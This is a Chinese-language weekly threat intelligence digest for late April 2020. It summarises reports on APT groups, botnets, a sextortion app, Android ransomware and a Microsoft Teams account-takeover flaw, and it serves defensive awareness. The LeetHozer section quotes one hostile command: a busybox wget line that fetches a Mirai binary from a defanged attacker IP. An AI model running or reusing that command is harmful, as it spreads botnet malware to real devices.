您所在的位置: 首頁(yè) >
安全研究 >
安全通告 >
一周高級(jí)威脅情報(bào)解讀
2020.04.23-2020.04.30
攻擊團(tuán)伙情報(bào)
Lazarus APT組織使用西方某航空巨頭招聘等信息針對(duì)特定國(guó)家的定向攻擊事件分析
Donot APT團(tuán)伙近期針對(duì)周邊國(guó)家和地區(qū)的攻擊活動(dòng)分析
PhantomLance:利用應(yīng)用商店傳播的海蓮花Android攻擊樣本分析
Gorgon Group組織利用“訂單,付款收據(jù)”等誘餌投遞攻擊郵件
Nazar:據(jù)影子經(jīng)紀(jì)人泄露文件發(fā)現(xiàn)的新APT組織
Hermit(隱士)APT組織2020年最新攻擊活動(dòng)分析
攻擊行動(dòng)或事件情報(bào)
Outlaw:針對(duì)歐洲的新型加密僵尸網(wǎng)絡(luò)
窺探裸聊詐騙背后黑色產(chǎn)業(yè)鏈的一角
惡意代碼情報(bào)
精準(zhǔn)投放Tsunami僵尸網(wǎng)絡(luò)和“魔鏟”挖礦木馬的行動(dòng)分析
UU頁(yè)游助手升級(jí)通道傳播獨(dú)狼Rootkit病毒,已感染上萬(wàn)臺(tái)電腦
Black Rose Lucy勒索軟件升級(jí)換代
LeetHozer Botnet分析報(bào)告
漏洞相關(guān)情報(bào)
Microsoft Teams中的帳戶接管漏洞,利用惡意的GIF可導(dǎo)致子域接管
其他相關(guān)
ESET:2020第一季度威脅報(bào)告
攻擊團(tuán)伙情報(bào)
1、Lazarus APT組織使用西方某航空巨頭招聘等信息針對(duì)特定國(guó)家的定向攻擊事件分析
披露時(shí)間:2020年04月30日
情報(bào)來(lái)源:
https://mp.weixin.qq.com/s/y1j5K0y38cnSPzRLbVvuFw
相關(guān)信息:
LazarusAPT組織是疑似具有東北亞背景的APT團(tuán)伙,該組織攻擊活動(dòng)最早可追溯到2007年,其早期主要針對(duì)韓國(guó)、美國(guó)等政府機(jī)構(gòu),以竊取敏感情報(bào)為目的。自2014年后,該組織開(kāi)始針對(duì)全球金融機(jī)構(gòu)、虛擬貨幣交易所等為目標(biāo),進(jìn)行以斂財(cái)為目的的攻擊活動(dòng)。
據(jù)公開(kāi)情報(bào)顯示,2014 年索尼影業(yè)遭黑客攻擊事件,2016 年孟加拉國(guó)銀行數(shù)據(jù)泄露事件,2017年美國(guó)國(guó)防承包商、美國(guó)能源部門及英國(guó)、韓國(guó)等比特幣交易所被攻擊等時(shí)間都出自Lazarus之手。
近日,紅雨滴團(tuán)隊(duì)和奇安信APT實(shí)驗(yàn)室又監(jiān)測(cè)到該組織利用敏感國(guó)家外交關(guān)系,西方某航空航天巨頭招聘等信息開(kāi)展新一輪攻擊活動(dòng)。此次活動(dòng)中,該組織采用模板注入的方式從遠(yuǎn)程服務(wù)器獲取帶有惡意宏的文檔執(zhí)行,從而繞過(guò)殺軟檢測(cè),值得注意的是第一次上傳VirusTotal時(shí)僅有一家殺軟成功檢出。
2、Donot APT團(tuán)伙近期針對(duì)周邊國(guó)家和地區(qū)的攻擊活動(dòng)分析
披露時(shí)間:2020年04月28日
情報(bào)來(lái)源:
https://mp.weixin.qq.com/s/e47ui2Gl0jqQSz6F12bxHA
相關(guān)信息:
Donot“肚腦蟲(chóng)”(APT-C-35)是疑似具有南亞背景的APT組織,其主要以周邊國(guó)家的政府機(jī)構(gòu)為目標(biāo)進(jìn)行網(wǎng)絡(luò)攻擊活動(dòng),通常以竊密敏感信息為目的。該組織具備針對(duì)Windows與Android雙平臺(tái)的攻擊能力。
近期,奇安信紅雨滴和奇安信APT實(shí)驗(yàn)室在日常的跟蹤過(guò)程中,再次監(jiān)測(cè)到該組織開(kāi)展了新一輪攻擊活動(dòng)。此次攻擊活動(dòng)中,該組織采用的技戰(zhàn)術(shù)手法并未發(fā)生大的變化,只是在代碼中做了些輕微改動(dòng):例如下載器中將字符串簡(jiǎn)單加密處理、Android樣本中將C2等信息簡(jiǎn)單加密處理等。
3、PhantomLance:利用應(yīng)用商店傳播的海蓮花Android攻擊樣本分析
披露時(shí)間:2020年04月29日
情報(bào)來(lái)源:
https://securelist.com/apt-phantomlance/96772/
相關(guān)信息:
Dr.WEB在2019年披露了一個(gè)存在于Google Play商店中的后門木馬,該木馬較之常規(guī)惡意軟件更為復(fù)雜??ò退够谠搱?bào)告追溯到一個(gè)自2015年至今長(zhǎng)期活躍的攻擊活動(dòng),并將其命名為“PhantomLance”。
該攻擊活動(dòng)主要通過(guò)包括Google Play在內(nèi)的Android應(yīng)用商店進(jìn)行傳播,通過(guò)偽裝成瀏覽器清理工具等誘導(dǎo)受害者下載安裝。根據(jù)卡巴斯基研究表明,該惡意木馬至今已迭代3個(gè)版本,主要以竊取受害者設(shè)備上的敏感信息為目的。攻擊活動(dòng)與海蓮花存在重疊,惡意樣本與海蓮花 Android樣本在代碼結(jié)構(gòu)上存在較大的相似度,同時(shí)也與海蓮花 MacOs后門存在相同的命名方式。
根據(jù)卡巴斯基數(shù)據(jù)顯示,自2016年起,印度、越南、孟加拉國(guó)‘、印度尼西亞等南亞國(guó)家大約有300臺(tái)Android設(shè)備被攻擊。
4、Gorgon Group組織利用“訂單,付款收據(jù)”等誘餌投遞攻擊郵件
披露時(shí)間:2020年04月27日
情報(bào)來(lái)源:
https://mp.weixin.qq.com/s/Td6zdGxeOjKEh3nu-vAGdw
相關(guān)信息:
近期騰訊安全威脅情報(bào)中心檢測(cè)到多個(gè)企業(yè)受到以PPT文檔為誘餌文檔的釣魚(yú)郵件攻擊。這些釣魚(yú)郵件投遞的PPT文檔包均含惡意宏代碼,宏代碼會(huì)啟動(dòng)mshta執(zhí)行保存在pastebin上的遠(yuǎn)程腳本代碼,且pastebin URL是由Bitly生成的短鏈接。
此次攻擊的主要特點(diǎn)為惡意代碼保存在托管平臺(tái)pastebin上:包括VBS腳本、Base64編碼的Powershell腳本以及經(jīng)過(guò)混淆的二進(jìn)制數(shù)據(jù)。攻擊者在后續(xù)階段會(huì)通過(guò)計(jì)劃任務(wù)下載RAT木馬,然后將其注入指定進(jìn)程執(zhí)行,RAT會(huì)不定期更換,當(dāng)前獲取的RAT 木馬是Azorult竊密木馬。
對(duì)比分析發(fā)現(xiàn),攻擊者注冊(cè)的pastebin賬號(hào)為”lunlayloo”( 創(chuàng)建于2019年10月),與另一個(gè)賬號(hào)“hagga”(創(chuàng)建于2018年12月)對(duì)應(yīng)攻擊事件中使用的TTP高度相似,因此騰訊威脅情報(bào)中旬認(rèn)為兩者屬于同一家族ManaBotnet,并且”lunlayloo”可能為“hagga”的后繼者。
有安全廠商分析認(rèn)為Pastebin賬號(hào)“hagga”發(fā)起的攻擊活動(dòng)有可能來(lái)自組織Gorgon Group,一個(gè)疑似來(lái)自巴基斯坦或與巴基斯坦有關(guān)聯(lián)的黑客組織。該組織已進(jìn)行了一系列非法行動(dòng)和針對(duì)性攻擊,包括針對(duì)英國(guó)、西班牙、俄羅斯和美國(guó)的政府組織的攻擊。
5、Nazar:據(jù)影子經(jīng)紀(jì)人泄露文件發(fā)現(xiàn)的新APT組織
披露時(shí)間:2020年04月22日
情報(bào)來(lái)源:
https://www.epicturla.com/blog/the-lost-nazar
相關(guān)信息:
2017年,”影子經(jīng)紀(jì)人”披露了一系列黑客工具,其中令威脅分析人員感興趣的是SIGS.py,該文件是NSA用于檢索其余APT組織的掃描程序,至今仍有15個(gè)組織未被安全廠商確認(rèn)。
近期,在OPCDE網(wǎng)絡(luò)安全峰會(huì)上,安全研究人員披露了其關(guān)于SIG37的研究,該安全研究人員稱SIG37對(duì)應(yīng)的組織疑似來(lái)自伊朗,對(duì)應(yīng)的惡意軟件中有“khzer”一詞,據(jù)稱該詞在波斯語(yǔ)中意為監(jiān)督,監(jiān)視。因此,研究人員將該組織命名為Nazar.
6、Hermit(隱士)APT組織2020年最新攻擊活動(dòng)分析
披露時(shí)間:2020年04月24日
情報(bào)來(lái)源:
https://mp.weixin.qq.com/s/Gukd2lNr9lE8fluG4bFfSw
相關(guān)信息:
兩年前,騰訊安全威脅情報(bào)中心曝光了SYSCON/SANNY木馬的活動(dòng)情況,并且根據(jù)關(guān)聯(lián)分析確定跟KONNI為同一組織所為。該組織的攻擊對(duì)象包括與朝鮮半島相關(guān)的非政府組織、政府部門、貿(mào)易公司、新聞媒體等。
SYSCON/SANNY木馬是一個(gè)非常有特色的遠(yuǎn)程控制木馬,通過(guò)ftp協(xié)議來(lái)進(jìn)行C&C控制,該后門的主要攻擊目標(biāo)為朝鮮半島相關(guān)的重要政治人物或者要害部門,偶爾也會(huì)針對(duì)東南亞等國(guó)進(jìn)行攻擊。該活動(dòng)自2017年下半年開(kāi)始活躍,并且對(duì)多個(gè)目標(biāo)進(jìn)行了攻擊活動(dòng)。被曝光后,該組織活動(dòng)沒(méi)有任何減弱的跡象。騰訊安全威脅情報(bào)中心根據(jù)該組織的特點(diǎn),在2018年12月將其命名為“Hermit(隱士)”。
2020年,“Hermit(隱士)”APT組織依然保持較高的活躍度,攻擊方式和木馬行為上也有了較大的更新,因此騰訊威脅情報(bào)中旬對(duì)近期的攻擊活動(dòng)做一個(gè)整理,并對(duì)木馬的一些更新情況做一個(gè)詳細(xì)分析匯總。
攻擊行動(dòng)或事件情報(bào)
1、Outlaw:針對(duì)歐洲的新型加密僵尸網(wǎng)絡(luò)
披露時(shí)間:2020年04月28日
情報(bào)來(lái)源:
https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/
相關(guān)信息:
Outlaw是2018年趨勢(shì)科技披露的僵尸網(wǎng)絡(luò)團(tuán)伙,該團(tuán)伙早期主要針對(duì)汽車和金融行業(yè)。通常使用暴力破解和SSH漏洞實(shí)現(xiàn)對(duì)目標(biāo)系統(tǒng)的遠(yuǎn)程訪問(wèn)。
近期,Yoroi在日常的監(jiān)測(cè)活動(dòng)中,攔截了嘗試攻擊其客戶的Linux惡意軟件,經(jīng)分析發(fā)現(xiàn),該惡意軟件是著名的“Shellbot”變體,“Shellbot”是Outlaw團(tuán)伙常用的惡意軟件。捕獲的變體與perl后門捆綁,其中包括SSH掃描器。該攻擊活動(dòng)主要針對(duì)全球范圍內(nèi)具備IRC服務(wù)器和新Moneroc池的組織。
2、窺探裸聊詐騙背后黑色產(chǎn)業(yè)鏈的一角
披露時(shí)間:2020年04月28日
情報(bào)來(lái)源:
https://ti.qianxin.com/blog/articles/peeking-into-the-corner-of-the-black-industry-chain-behind-naked-chat-scams
相關(guān)信息:
近日,奇安信病毒響應(yīng)中心在日常黑產(chǎn)挖掘過(guò)程中發(fā)現(xiàn)有人以裸聊的形式在社交網(wǎng)絡(luò)上傳播某種視頻直播軟件,該軟件在提供正常直播內(nèi)容的同時(shí)還會(huì)在暗地里收集用戶數(shù)據(jù),而受害者往往控制不住自己的欲望,導(dǎo)致個(gè)人信息被泄露,嚴(yán)重的甚至被敲詐錢財(cái)。
該APK樣本經(jīng)過(guò)加固,輸入手機(jī)號(hào)和正確的推廣碼后才會(huì)執(zhí)行惡意代碼將相關(guān)信息上傳到服務(wù)器上。所以該樣本免殺效果非常好,很難被探測(cè)到,經(jīng)過(guò)后續(xù)擴(kuò)展發(fā)現(xiàn)這是一套完整的裸聊詐騙框架,已經(jīng)被大量的黑產(chǎn)團(tuán)伙使用。
近幾年,隨著多種新型網(wǎng)絡(luò)詐騙興起,前有博彩殺豬盤在東南亞搞的風(fēng)生水起,后有網(wǎng)貸,校園貸在內(nèi)地危害人間,造成了當(dāng)事人傾家蕩產(chǎn)、自殺等人間慘劇,嚴(yán)重影響了社會(huì)秩序。而本文讓我們來(lái)聊一聊裸聊與詐騙。
任何事物都會(huì)不斷的發(fā)展進(jìn)化,以適應(yīng)當(dāng)下的環(huán)境,裸聊也不例外。早期裸聊的形式較為簡(jiǎn)單,黑產(chǎn)團(tuán)伙建立色情站點(diǎn),會(huì)先通過(guò)“試聊”的方式消除用戶的顧慮,幾分鐘后彈出對(duì)話框提示“賬戶余額不足”需要充值才能繼續(xù)聊天,之后還會(huì)提供VIP會(huì)員服務(wù),加入VIP后可以享受女主播一對(duì)一裸聊服務(wù)和上門服務(wù)。
到了2019年黑產(chǎn)們改進(jìn)了裸聊的形式,并結(jié)合大火的“殺豬盤”模式,從原來(lái)只彈框的被動(dòng)接觸,變成了現(xiàn)在的主動(dòng)和被動(dòng)相結(jié)合的形式,主動(dòng)在社交網(wǎng)絡(luò)上與你發(fā)起會(huì)話進(jìn)行聊天,使用相關(guān)《話術(shù)》誘導(dǎo)你進(jìn)行裸聊,上鉤之后會(huì)發(fā)你app的下載二維碼以及對(duì)應(yīng)的邀請(qǐng)碼。裸聊App會(huì)獲取你的通訊錄并錄制裸聊時(shí)的視頻,裸聊結(jié)束后會(huì)對(duì)你進(jìn)行恐嚇和勒索。
惡意代碼情報(bào)
1、精準(zhǔn)投放Tsunami僵尸網(wǎng)絡(luò)和“魔鏟”挖礦木馬的行動(dòng)分析
披露時(shí)間:2020年04月24日
情報(bào)來(lái)源:
https://mp.weixin.qq.com/s/vAq_8LL0GlS-DLi5KNZJ9g
相關(guān)信息:
近日,安天CERT聯(lián)合哈爾濱工業(yè)大學(xué)網(wǎng)絡(luò)安全響應(yīng)組通過(guò)網(wǎng)絡(luò)安全監(jiān)測(cè)發(fā)現(xiàn)了一起僵尸網(wǎng)絡(luò)和挖礦木馬事件,該事件針對(duì)Linux系統(tǒng),包含服務(wù)器和智能設(shè)備。攻擊者配置了一個(gè)IP列表,如果目標(biāo)主機(jī)外網(wǎng)IP在列表中則下載運(yùn)行Tsunami僵尸程序,如果目標(biāo)主機(jī)外網(wǎng)IP不在列表中則下載運(yùn)行“魔鏟”挖礦木馬,IP列表共8487條,全球范圍內(nèi)涉及政府部門、金融行業(yè)、互聯(lián)網(wǎng)企業(yè)、媒體、運(yùn)營(yíng)商等多種目標(biāo),國(guó)內(nèi)也有大量目標(biāo)。
安天CERT分析推測(cè),IP列表中的對(duì)應(yīng)機(jī)構(gòu)的特點(diǎn)是網(wǎng)絡(luò)流量相對(duì)較大,因此被攻擊者用來(lái)做僵尸網(wǎng)絡(luò)的組成部分;IP列表外的,網(wǎng)絡(luò)流量可能相對(duì)較小,因此被攻擊者用來(lái)挖礦。
被感染的Linux系統(tǒng)的計(jì)劃任務(wù)中,存在一個(gè)每隔一段時(shí)間執(zhí)行一次下載和運(yùn)行update.sh腳本的任務(wù)。該腳本功能是獲取計(jì)算機(jī)信息(用戶id、處理器架構(gòu)和公網(wǎng)IP),連接網(wǎng)絡(luò)讀取一個(gè)IP列表(server.txt),判斷主機(jī)的公網(wǎng)IP是否存在于該IP列表中,如果存在則準(zhǔn)備下載組成僵尸網(wǎng)絡(luò)的僵尸程序運(yùn)行,如果不存在則準(zhǔn)備下載挖礦木馬運(yùn)行。
2、UU頁(yè)游助手升級(jí)通道傳播獨(dú)狼Rootkit病毒,已感染上萬(wàn)臺(tái)電腦
披露時(shí)間:2020年04月28日
情報(bào)來(lái)源:
https://mp.weixin.qq.com/s/MchLCxba26Z0KMZthv-uLA
相關(guān)信息:
騰訊安全威脅情報(bào)中心檢測(cè)發(fā)現(xiàn),UU頁(yè)游助手通過(guò)其軟件升級(jí)通道,傳播獨(dú)狼Rootkit病毒。獨(dú)狼Rootkit家族是一個(gè)長(zhǎng)期依賴第三方Ghost鏡像傳播的惡性鎖主頁(yè)后門病毒。本次由于通過(guò)借助UU頁(yè)游助手推廣渠道流氓傳播,使得獨(dú)狼Rootkit病毒在短時(shí)間內(nèi)感染量激增,受害網(wǎng)民已過(guò)萬(wàn),分布在全國(guó)各地。中毒電腦會(huì)出現(xiàn)莫名其妙安裝不請(qǐng)自來(lái)的軟件、頻繁彈出廣告、瀏覽器主頁(yè)被鎖定等現(xiàn)象。
3、Black Rose Lucy勒索軟件升級(jí)換代
披露時(shí)間:2020年04月28日
情報(bào)來(lái)源:
https://research.checkpoint.com/2020/lucys-back-ransomware-goes-mobile/
相關(guān)信息:
Black Rose Lucy是Check Point2018年披露的惡意軟件,該惡意軟件早期是針對(duì)Android平臺(tái)的僵尸網(wǎng)絡(luò),近期,Check Point監(jiān)測(cè)發(fā)現(xiàn),該惡意軟件新增了勒索功能,執(zhí)行后,將對(duì)受害者設(shè)備文件進(jìn)行加密,并聲稱是來(lái)自美國(guó)聯(lián)邦調(diào)查局的,指控受害者設(shè)備上擁有非法的色情內(nèi)容,并已經(jīng)相關(guān)犯罪數(shù)據(jù)上傳至FBI,需要受害者交付贖金以免受牢獄之災(zāi)。
4、LeetHozer Botnet分析報(bào)告
披露時(shí)間:2020年04月28日
情報(bào)來(lái)源:
https://blog.netlab.360.com/the-leethozer-botnet/
相關(guān)信息:
近期,360 NetLab捕獲了一個(gè)可疑的樣本,部分殺毒引擎將其識(shí)別為Mirai,但是其網(wǎng)絡(luò)流量卻不符合Mirai的特征,這引起了注意,經(jīng)分析,這是一個(gè)復(fù)用了Mirai的Reporter,Loader機(jī)制,重新設(shè)計(jì)了加密方法以及C2通信協(xié)議的Bot程序。
這個(gè)Bot程序之所以能在眾多變種脫穎而出,一是因?yàn)樗?dú)特的的加密方法,嚴(yán)謹(jǐn)?shù)耐ㄐ艆f(xié)議;二是因?yàn)樵谒菰催^(guò)程中,360 NetLab發(fā)現(xiàn)它很有可能隸屬于Moobot團(tuán)伙而且正在迭代開(kāi)發(fā)中。因?yàn)閭鞑ミ^(guò)程中使用H0z3r字串(/bin/busybox wgethttp://37[.49.226.171:80/bins/mirai.m68k -O - > H0z3r;),360 NetLab將其命名為L(zhǎng)eetHozer。目前觀測(cè)到感染目標(biāo)主要是雄邁旗下的固件版本早于2017年5月的H.264設(shè)備和部分固件版本晚于2017年5月H.265設(shè)備。
1、Microsoft Teams中的帳戶接管漏洞,利用惡意的GIF可導(dǎo)致子域接管
披露時(shí)間:2020年4月27日
情報(bào)來(lái)源:
https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/
相關(guān)信息:
隨著越來(lái)越多的企業(yè)從遠(yuǎn)程位置開(kāi)展業(yè)務(wù),攻擊者將精力集中在利用關(guān)鍵技術(shù)(例如Zoom和Microsoft Teams)上,這些技術(shù)是公司及其員工保持聯(lián)系的基礎(chǔ).
Cyberark安全研究人員發(fā)現(xiàn)Microsoft Teams中的子域接管漏洞,攻擊者可使用惡意GIF來(lái)抓取用戶的數(shù)據(jù),并最終接管組織中的所有Teams帳戶。此漏洞將影響使用Teams桌面或Web瀏覽器版本的用戶。
其他相關(guān)
1、ESET:2020第一季度威脅報(bào)告
披露時(shí)間:2020年04月29日
情報(bào)來(lái)源:
https://www.welivesecurity.com/2020/04/29/eset-threat-report-q12020/
相關(guān)信息:
2020年第一季度,COVID-19爆發(fā),使大部分地區(qū)處于封鎖狀態(tài),但ESET安全研究人員并沒(méi)有停止威脅研究工作。在第一季度,ESET分析了Stantinko中的混淆技術(shù),詳細(xì)介紹了針對(duì)巴西的銀行木馬Guildma。并披露了Turla針對(duì)亞美尼亞的水坑攻擊等。
與上一季度相比,2020第一季度中挖礦和Android惡意軟件有所下降,其他類型威脅則持上升趨勢(shì),特別使Web相關(guān)的攻擊次數(shù)漲幅最大,這或許與新冠病毒的爆發(fā)相關(guān)。(來(lái)源:奇安信威脅情報(bào)中心)